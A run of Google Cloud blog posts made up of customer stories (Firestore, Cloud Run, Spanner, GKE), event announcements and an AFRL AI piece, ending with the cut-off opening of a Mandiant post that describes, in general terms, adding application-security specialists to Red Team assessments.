HighLevel is an all-in-one sales and marketing platform built for agencies. We empower businesses to streamline their operations with tools like CRM, marketing automation, appointment scheduling, funnel building, membership management, and more. But what truly sets HighLevel apart is our commitment to AI-powered solutions, helping our customers automate their businesses and achieve remarkable results.
As a software as a service (SaaS) platform experiencing rapid growth, we faced a critical challenge: managing a database that could handle volatile write loads. Our business often sees database writes surge from a few hundred requests per second (RPS) to several thousand within minutes. These sudden spikes caused performance issues with our previous cloud-based document database.
This previous solution required us to provision dedicated resources, which created several bottlenecks:
Slow release cycles: Provisioning resources before every release impacted our agility and time-to-market.
Scaling limitations: We constantly battled DiskOps limitations due to high write throughput and numerous indexes. This forced us to shard larger collections across clusters, requiring complex coordination and consuming valuable engineering time.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef6787c9400>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Going serverless with Firestore
To overcome these challenges, we sought a database solution that could seamlessly scale and handle our demanding write requirements.
Firestore‘s serverless architecture made it a strong contender from the start. But it was the arrival of point-in-time recovery and scheduled backups that truly solidified our decision. These features eliminated our initial concerns and gave us the confidence to migrate the majority of HighLevel’s workloads to Firestore.
Since migrating to Firestore, we have seen significant benefits, including:
Increased developer productivity: Firestore’s simplicity has boosted our developer productivity by 55%, allowing us to focus on product innovation.
Enhanced scalability: We’ve scaled to over 30 billion documents without any manual intervention, handling workloads with spikes of up to 250,000 RPS and five million real-time queries.
Improved reliability: Firestore has proven exceptionally reliable, ensuring consistent performance even under peak load.
Real-time capabilities: Firestore’s real-time sync capabilities power our real-time dashboards without the need for complex socket infrastructure.
Firestore powering HighLevel’s AI
Firestore also plays a crucial role in enabling our AI-powered services across Conversation AI, Content AI, Voice AI and more. All these services are designed to put our customers’ businesses on autopilot.
Fig. 1: HighLevel AI features
For Conversation AI, for example, we use a retrieval augmented generation (RAG) architecture. This involves crawling and indexing customer data sources, generating embeddings, and storing them in Firestore, which acts as our vector database. This approach allows us to:
Overcome context window limitations of generative AI models
Reduce latency and cost
Improve response accuracy and minimize hallucinations
Fig. 2: HighLevel’s AI Architecture
Lessons learned and a path forward
Fig. 3: Google Firestore field indexes data
Our journey with Firestore has been eye-opening, and we’ve learned valuable lessons along the way.
For example, in December 2023, we encountered intermittent failures in collections with high write queries per second (QPS). These collections were experiencing write latencies of up to 60 seconds, causing operations to fail as deadlines expired before completion. With support from the Firestore team, we conducted a root-cause analysis and discovered that the issue stemmed from default single-field indexes on constantly increasing fields. These indexes, while helpful for single-field queries, were generating excessive writes on a specific sector of the index.
Once we understood the root cause, our team identified and excluded these unused indexes. This optimization resulted in a dramatic improvement, reducing write-tail latency from 60 seconds to just 15 seconds.
Firestore has been instrumental in our ability to scale rapidly, enhance developer productivity, and deliver innovative AI-powered solutions. We are confident that Firestore will continue to be a cornerstone of our technology stack as we continue to grow and evolve. Moving forward, we are excited to continue leveraging Firestore and Google Cloud to power our AI initiatives and deliver exceptional value to our customers.
Get started
Are you curious to learn more about how to use Firestore in your organization?
Watch our Next 2024 breakout session to discover recent Firestore updates, learn more about how HighLevel is experiencing significant total cost of ownership savings, and more!
This project has been a team effort. Shout out to the Platform Data team — Pragnesh Bhavsar in particular who has done an amazing job leading the team to ensure our data infrastructure runs at such a massive scale without hiccups. We also want to thank Varun Vairavan and Kiran Raparti for their key insights and guidance. For more from Karan Agarwal, follow him on LinkedIn.
Usually, financial institutions process multiple millions of transactions daily. Obviously, when running on cloud technology, any security lapse in their cloud infrastructure might have catastrophic consequences. In serverless setups for compute workloads Cloud Run on Google Cloud is employed. That’s why we are happy to announce the general availability of Google Cloud’s custom org policies to fortify Cloud Run environments and ensure it can be aligned seamlessly to fulfill the weakest up to stringent regulatory standards.
Financial service institutions operate under stringent global and local regulatory frameworks and bodies, such as regulations from the EU’s European Banking Authority, US Securities and Exchange Commission, or the Monetary Authority of Singapore. Also, the sensitive nature of financial data necessitates robust security measures. Hence, maintaining a comprehensive security posture is of major importance, encompassing both coarse-grained and fine-grained controls to address internal and external threats.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef677699940>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Tailored Security, Configurable to Customer’s Needs
Network Access: Reduce unauthorized access attempts by precisely defining VPC configurations and ingress settings.
Deployment Security: Mandatory binary authorization is able to prevent potentially harmful deployments.
Resource Efficiency: Constraints on memory and CPU usage ensure getting the most out of cloud resources.
Stability & Consistency: Limiting the use of Cloud Run features to those in general vailability (GA) and enforcing standardized naming conventions enables a predictable, manageable environment.
This level of customization enables building a Cloud Run environment that’s not just secure, but also perfectly aligned with unique operational requirements.
Addressing the Complexities of Commerzbank’s Cloud Run Setup
Within Commerzbank’s Big Data & Advanced Analytics division, the company leverages cloud technology for its inherent benefits, particularly serverless services. Cloud Run is a crucial component of our serverless architecture and stretches across many applications due to its flexibility. While Cloud Run already offered security features such as VPC Service Controls, multi-regionality, and CMEK support, granular control over all Cloud Run’s capabilities was initially limited.
Diagram illustrating simplified policy management with Custom Org Policies
Better Together
The introduction of Custom Org Policies for Cloud Run now allows Commerzbank to directly map its rigorous security controls, ensuring compliant use of the service. This enhanced control enables the full-scale adoption and scalability of Cloud Run to support our business needs.
The granular control possible due to Custom Org Policies has been a game-changer. Commerzbank and customers like it can now tailor their security policies to their exact needs, preventing potential breaches and ensuring regulatory compliance.
A Secure Foundation for Innovation
Custom Org Policies have become an indispensable part of the cloud security toolkit. Their ability to enforce granular, tailored controls has boosted Commerzbank’s Cloud Run security and compliance. This newfound confidence allows them to innovate with agility, knowing their cloud infrastructure is locked down.
If you’re looking to enhance your Cloud Run security and compliance, we highly recommend exploring Custom Org Policies. They’ve been instrumental in Commerzbank’s journey, and we’re confident they can benefit your organization, too.
Looking Ahead: We’re also eager to explore how to leverage custom org policies for other Google Cloud services as Commerzbank continues to expand its cloud footprint. The bank’s commitment to security and compliance is unwavering, and custom org policies will remain a cornerstone of Commerzbank’s strategy.
We’re excited to share that Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Data Integration Tools. As a Leader in this report, we believe Google’s position is a testament to delivering continuous customer innovation in areas such as unified data to AI governance, flexible and accessible data engineering experiences, and AI-powered data integration capabilities.
Today, most organizations operate with just 10% of the data they generate, which is often trapped in silos and disconnected legacy systems. The rise of AI unlocks the potential of the remaining 90%, enabling you to unify this data — regardless of format — within a single platform.
This convergence is driving a profound shift in how data teams approach data integration. Traditionally, data integration was seen as a separate IT process solely for enterprise business intelligence. But with the increased adoption of the cloud, we’re witnessing a move away from legacy on-premises technologies and towards a more unified approach that enables various users to access and work with a more robust set of data sources.
At the same time, organizations are no longer content with simply collecting data; they need to analyze it and activate it in real-time to gain a competitive edge. This is why leading enterprises are either migrating to or building their next-gen data platforms with BigQuery, converging the world of data lakes and warehouses. BigQuery’s unified data and AI capabilities combined with Google Cloud’s comprehensive suite of fully managed services, empower organizations to ingest, process, transform, orchestrate, analyze, and activate their data with unprecedented speed and efficiency. This end-to-end vision delivers on the promise of data transformation, so businesses can unlock the full value of their data and drive innovation.
Choice and flexibility to meet you where you are
Organizations thrive on data-driven decisions, but often struggle to wrangle information scattered across various sources. Google Cloud tools simplify data integration, by letting you:
Streamline data integration from third-party applications – With BigQuery Data Transfer Service, onboarding data from third-party applications like Salesforce or Marketo becomes dramatically simplified, eliminating complex coding and saving valuable time and data movement costs.
Create SQL-based pipelines – Dataform helps create robust, SQL-based pipelines, orchestrating the entire data integration flow easily and scalably. This flexibility empowers organizations to connect all their data dots, wherever they are, so they can unlock valuable insights faster.
Use gen-AI powered data preparation – BigQuery data preparation empowers analysts to clean and prepare data directly within BigQuery, using Gemini’s AI for intelligent transformations to streamline processes and help ensure data quality.
Bridging operational and analytical systems
Data teams know how frustrating it can be to have valuable analytical insights trapped in a data warehouse, disconnected from the operational systems where they could make a real impact. You don’t want to get bogged down in the complexities of ELT vs. ETL vs. ETL-T — you need solutions that prioritize SLAs to ensure on-time and consistent data delivery. This means having the right connectors to meet your needs, especially with the growing importance of real-time data. Google Cloud offers a powerful suite of integrated tools to bridge this gap, helping you easily connect your analytical insights with your operational systems to drive real-time action. With Google Cloud’s data tools, you can:
Perform advanced similarity searches and AI-powered analysis – Vector support across BigQuery and all Google databases lets you perform advanced similarity searches and AI-powered analysis directly on operational data.
Query operational data without moving it – Data Boost enables analysts to query data in place across sources like Bigtable and Vertex AI, while BigQuery’s continuous queries facilitate reverse ETL, pushing updated insights back into operational systems.
Implement real-time data integration and change data capture – Datastream captures changes and delivers them with low latency. Dataflow, Google Managed Service for Kafka, Pub/Sub, and new support for Apache Flink further enhance the reverse ETL process, fueling operational systems with fresh, actionable insights derived from analytics, all while using popular open-source software.
Governance at the heart of a unified data platform
Having strong data governance is critical, not just a checkbox item. It’s the foundation of ensuring your data is high-quality, secure, and compliant with regulations. Without it, you risk costly errors, security breaches, and a lack of trust in the insights you generate. BigQuery treats governance as a core component, not an afterthought, with a range of built-in features that simplify and automate the process, so you can focus on what matters most — extracting value from your data.
Easily search, curate and understand data with accelerated data exploration – With BigQuery data insights powered by Gemini, users can easily search, curate, and understand the data landscape, including the lineage and context of data assets. This intelligent discovery process helps remove the guesswork and accelerates data exploration.
Automatically capture and manage metadata – BigQuery’s automated data cataloging capabilities automatically capture and manage metadata, minimizing manual harvesting and helping to ensure consistency.
Google Cloud’s infrastructure is purpose-built with AI in mind, allowing users to easily leverage generative AI capabilities at scale. Users can train models, generate vector embeddings and indexes, and deploy data and AI use cases without leaving the platform. AI is infused throughout the user journey, with features like Gemini-assisted natural language processing, secure model integration, AI-augmented data exploration, and AI-assisted data migrations. This AI-centric approach delivers a strong user experience for data practitioners with varying skill sets and expertise.
2024 Gartner Magic Quadrant for Data Integration Tools -Thornton Craig et al, December 3, 2024. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
Editor’s note: In the heart of the fintech revolution, Current is on a mission to transform the financial landscape for millions of Americans living paycheck to paycheck. Founded on the belief that everyone deserves access to modern financial tools, Current is redefining what it means to be a financial institution in the digital age. Central to their success is a cloud-native infrastructure built on Google Cloud, with Spanner, Google’s globally distributed database with virtually unlimited scale, serving as the bedrock of their core platform.
More than 100 million Americans struggle to make ends meet, including the 23% of low-income Americans the Federal Reserve estimates do not have a bank account. Current was created to address their needs with a unique business model focused on payments, rather than the deposits and withdrawals of traditional financial institutions. We offer an easily accessible experience designed to make financial services available to all Americans, regardless of age or income.
Our innovative approach — built on proprietary banking core technology with minimal reliance on third-party providers — enables us to rapidly deploy financial solutions tailored to our members’ immediate needs. More importantly, these solutions are flexible enough to evolve alongside them in the future.
In our mission to deliver an exceptional experience, one of the biggest challenges we faced was creating a scalable and robust technological foundation for our financial services. To address this, we developed a modern core banking system to power our platform. Central to this core is our user graph service, which manages all member entities — such as users, products, wallets, and gateways.
Many unbanked and disadvantaged Americans lack bank accounts due to a lack of trust in institutions as much as because of any lack of funds. If we were going to win their trust and business, we knew we had to have a secure, seamless, and reliable service.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5581c88730>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
A cloud-native core with Spanner
Our previous self-hosted graph database solution lacked cloud-native capabilities and horizontal scalability. To address these limitations, we strategically transitioned to managed persistence layers, which significantly improves our risk posture. Features like point-in-time restore and multi-regional redundancy enhanced our resilience, reduced recovery time objectives (RTO) and improved recovery point objectives (RPO). Additionally, push-button scaling optimized our cloud budget and operational efficiency.
This cloud-native platform necessitated a database solution with consistent writes, horizontal scalability, low read latency under load, and multi-region failover. Given our extensive use of Google Cloud, we prioritized its database offerings. Spanner emerged as the ideal solution, fulfilling all our requirements. It offers consistent writes, horizontal scalability, and the ability to maintain low read latency even under heavy load. Its seamless scalability — particularly the decoupling of compute and storage resources — proved invaluable in adapting to our dynamic consumer environment.
This robust and scalable infrastructure empowers Current to deliver reliable and efficient financial services, critical for building and maintaining member trust. We are the primary financial relationship for millions of Americans who are trusting us with their money week after week.Our experience migrating from a third-party database to Spanner proved that transitioning to a globally scalable, highly available database can be easy and seamless. Spanner’s unique ability to scale compute and storage independently proved invaluable in managing our dynamic user base.
Our strategic migration to Spanner employed a write-ahead commit log to ensure a seamless transition. By prioritizing the migration of reads and verifying their accuracy before shifting writes, we minimized risk and maximized efficiency. This process resulted in a zero-downtime, zero-loss cutover, where we could first transition reads to Spanner on a service-by-service basis, confirm accuracy, and finally migrate writes.
Ultimately, our Spanner-powered user graph service delivered the consistency, reliability, and scalability essential for our financial platform. We had renewed confidence in our ability to serve our millions of customers with reliable service and new abilities to scale our existing services and future offerings.
Unwavering Reliability and Enhanced Operational Efficiency
Spanner has dramatically improved our resilience, reducing RTO and RPO by more than 10x, cutting times to just one hour. With Spanner’s streamlined data restoration process, we can now recover data with a few simple clicks. Offloading operational management has also significantly decreased our team’s maintenance burden. With nearly 5,000 transactions per second, we continue to be impressed by Spanner’s performance and scalability.
Additionally, since migrating to Spanner, we have reduced our availability-related incidents to zero. Such incidents could disrupt essential banking functions like accessing funds or making payments, leading to customer dissatisfaction and potential churn, as well as increased operational costs for issue resolution. Elimination of these occurrences is critical for building and maintaining member trust, enhancing retention, and improving the developer experience.
Building Financial Resilience with Google Cloud
Looking ahead, we envision a future where our platform continues to evolve, delivering innovative financial solutions that meet the ever-changing needs of our members. With Spanner as the foundation of our core platform — you could call it the core of cores — we are confident in building a resilient and reliable platform that enables millions of more Americans to improve their financial outcomes.
In today’s congested digital landscape, businesses of all sizes face the challenge of optimizing their marketing budgets. They must find ways to stand out amid the bombardment of messages vying for potential customers’ attention. Moreover, they grapple with rising customer acquisition costs and dwindling retention rates, impeding their profitability.
Adding to this complexity is the abundance of consumer data, which businesses often struggle to harness effectively to target the right audience. To address these challenges, companies are seeking data-driven approaches to enhance their advertising effectiveness, to help ensure their continued relevance and profitability.
Moloco offers AI-powered advertising solutions that drive user acquisition, retention, and monetization efforts. Moloco Ads, its demand-side platform (DSP), utilizes its customers’ unique first-party data, helping them to target and acquire high-value users based on real-time consumer behavior — ultimately, delivering higher conversion rates and return on investment.
To meet this demand, Moloco leverages predictions from a dozen deep neural networks, while continuously designing and evaluating new models. The platform ingests 10 petabytes of data and processes bid requests per day at a peak rate of 10.5 million queries per second (QPS).
Moloco has seen tremendous growth over the last three years, with its business growing over 8X and multiple customers spending more than $50 million annually. Moloco’s rapid growth required an infrastructure that could handle massive data processing and real-time ML predictions while remaining cost effective. As Moloco’s models grew in complexity, training times increased, hindering productivity and innovation. Separately, the Moloco team realized that they also needed to optimize serving efficiency to scale low-latency ad experiences for users across the globe.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e55818530a0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Training complex ML models with GKE
After evaluating multiple cloud providers and their solutions, Moloco opted for Google Cloud for its scalability, flexibility, and robust partner ecosystem.The infrastructure provided by Google Cloud aligned with Moloco’s requirements for handling its rapidly growing data and machine learning workloads that are instrumental to optimizing customers’ advertising performance.
Google Kubernetes Engine (GKE) was a primary reason for Moloco selecting Google Cloud over other cloud providers. As Moloco discovered, GKE is more than a container orchestration tool; it’s a gateway to harnessing the full potential of AI and ML. GKE provides scalability and performance optimization tools to meet diverse ML workloads, and supports a wide range of frameworks, allowing Moloco to customize the platform according to their specific needs.
GKE serves as a foundation for a unified AI/ML platform, integrating with other Google Cloud services, facilitating a robust environment for the data processing and distributed computing that underpin Moloco’s complex AI and ML tasks. GKE’s ML data layer offers the high-throughput storage solutions that are crucial for read-heavy workloads. Features like cluster autoscaler, node-auto provisioner, and pod autoscalers ensure efficient resource allocation.
“Scaling our infrastructure as Moloco’s Ads business grew exponentially was a huge challenge. GKE’s autoscaling capabilities enabled the engineering team to focus on development without spending a ton of effort on operations.” – Sechan Oh, Director of Machine Learning, Moloco
Shortly after migrating to Google Cloud, Moloco began using GKE for model training. However, Moloco quickly found that using traditional CPUs was not competitive at its scale, in terms of both cost and velocity. GKE’s ability to autoscale on multi-host Tensor Processing Units (TPUs), Google’s specialized processing units for machine learning workloads, was critical to Moloco’s success, allowing Moloco to harness TPUs at scale, resulting in significant enhancements in training speed and efficiency.
Moloco further leveraged GKE’s AI and ML capabilities to optimize the management of its compute resources, minimizing idle time and generating cost savings while improving performance. Notably, GKE empowered Moloco to scale its ML infrastructure to accommodate exponential business growth without straining its engineering team. This enabled Moloco’s engineers to concentrate on developing AI and ML software instead of managing infrastructure.
“The GKE team collaborated closely with us to enable auto scaling for multi host TPUs, which is a recently added feature. Their help has really enabled amazing performance on TPUs, reducing our cost per training job by 2-4 times.” – Kunal Kukreja, Senior Machine Learning Engineer, Moloco
In addition to training models on TPUs, Moloco also uses GPUs on GKE to deploy ML models into production. This lets the Moloco platform handle real-time inference requests effectively and benefit from GKE’s scalability and operational stability, enhancing performance and supporting more complex models.
Moloco collaborated closely with the Google Cloud team throughout the implementation process, leveraging their expertise and guidance. The Google Cloud team supported Moloco in implementing solutions that ensured a smooth transition and minimal disruption to operations. Specifically, Moloco worked with the Google Cloud team to migrate its ML workloads to GKE using the platform’s autoscaling and pod prioritization capabilities to optimize resource utilization and cost efficiency. Additionally, Moloco integrated Cloud TPUs into its training pipeline, resulting in significantly reduced training times for complex ML models. Furthermore, Moloco optimized its serving infrastructure with GPUs, ensuring low-latency ad experiences for its customers.
A powerful foundation for ML training and inference
Moloco’s collaboration with Google Cloud profoundly transformed its capacity for innovation.
“By harnessing Google Cloud’s solutions, such as GKE and Cloud TPU, Moloco dramatically reduced ML training times by up to tenfold.”–Sechan Oh, Director of Machine Learning, Moloco
This in turn facilitated swift model iteration and experimentation, empowering Moloco’s engineers to innovate with unprecedented speed and efficiency. Moreover, the scalability and performance of Google Cloud’s infrastructure enabled Moloco to manage increasingly intricate models and expansive datasets, to create and implement cutting-edge machine learning solutions. Notably, Moloco’s low-latency advertising experiences, bolstered by GPUs, fostered enhanced customer satisfaction and retention.
Moloco’s success demonstrates the power of Google Cloud’s solutions to enable businesses achieve their full potential. By leveraging GKE, Cloud TPU, and GPUs, Moloco was able to scale its infrastructure, accelerate its ML training, and deliver exceptional ad experiences to its customers. As Moloco continues to grow and innovate, Google Cloud will remain a critical partner in its success.
Meanwhile, GKE is transforming the AI and ML landscape by offering a blend of scalability, flexibility, cost-efficiency, and performance. And Google Cloud continues to invest in GKE so it can handle even the most demanding AI training workloads. For example, GKE now supports 65,000-node clusters, offering unmatched scale for training or inference. For more, watch this demo of 65,000 nodes on a single GKE cluster.
Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.
Partner Summit is your exclusive opportunity to:
Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.
Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.
Google Cloud Next returns to Las Vegas, April 9–11, 2025* and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be even bigger and better than ever.
Join us for an unforgettable week of hands-on experiences, inspiring content, problem-solving with our top partners and seize the opportunity to learn from top experts and peers tackling the same challenges you are day in and day out. Walk away with new ideas, breakthrough skills and actionable knowledge only available at Google Cloud Next 2025.
Early bird registration is now available for just $999 for a limited time**.
Here’s why you need to be at Next:
Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.
* Select programming to take place in the afternoon of April 8. ** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.
Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.
This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt to cutting edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.
Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:
Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks, causing delays in moving and sharing data, getting access to US-based tools, using standard storage and hardware, and having the right system communications and integrations across third party infrastructure. Because of this, cross-team collaboration and experiment expansion was severely limited and inefficiently tracked. With very little cloud experience, the team was able to create a siloed environment where they used Google Cloud’s infrastructure, such as Google Compute Engine, Cloud Workstations, and Cloud Run to build analytic pipelines that helped them test, store, and analyze data in an automated and streamlined way. That data pipeline automation paved the way for further exploration and expansion on a use case that had never been done before.
Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process resulted in challenges in providing scalable, secure access to important content and information for users in different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application based on Google App Engine, integrated with Google Workspace and Apps Scripts, so that they could capture usage metrics for future hardware investment decisions and automate admin tasks that were taking time away from research. The result was significantly faster ability to make changes without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable design architecture with built-in SSO that helped streamline internal content for multiple labs.
Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud utilizes various infrastructure services, such as Cloud Run, Cloud SQL, and GKE and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.
By leveraging Google Cloud’s BigQuery and other analytics tools, this app provides personalized insights and recommendations for fatigue interventions and predictions that help capture valuable improvement mechanisms in cognitive effectiveness and overall well-being for Airmen.
Streamlined AI model development with Vertex AI:
The AFRL wanted to replicate the functionality of university HPC clusters, especially since there was a diversity of users that needed extra compute and not everyone was trained on how to use these tools. They wanted an easy GUI and to maintain active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter Notebooks through Workbench, Compute Engine, Cloud Shell, Cloud Build and much more to get a head start in creating a pipeline that could be used for sharing, ingesting, and cleaning their code. Having access to these resources helped create a flexible environment for researchers to do model development and testing in an accelerated manner.
Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.
Dr. Dan Berrigan
Air Force Research Laboratory
The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.
Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.
Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.
Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost
Executive Summary
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:
Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.
By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.
Introduction
In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.
This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”
The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).
Figure 1: Initial Compromise statistics from the M-Trends report
At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeters to gain a deeper understanding of their security posture. While most of the infrastructure typically receive a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.
This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
The Role of Application Security in Red Team Assessments
The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.
The AppSec specialist will often get involved as early as possible on an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping out the various application inventory and identifying vulnerabilities within the various components of web applications and application programming interfaces (APIs) exposed to the internet.
While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.
Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:
Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation
Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators will perform most of the remaining activities at this point, the AppSec consultants will stay close to the engagement and often engage to further support internal exploitations efforts. For example, applications that are only accessible internally generally get a lot less scrutiny and are consequently assessed much less frequently than externally accessible assets.
By incorporating AppSec expertise, we’ve achieved a significant increase of engagements where our Red Team successfully gained a significant advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This overall approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.
Case Studies: Demonstrating the Impact of Application Security Support
In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.
These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.
Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access
Context
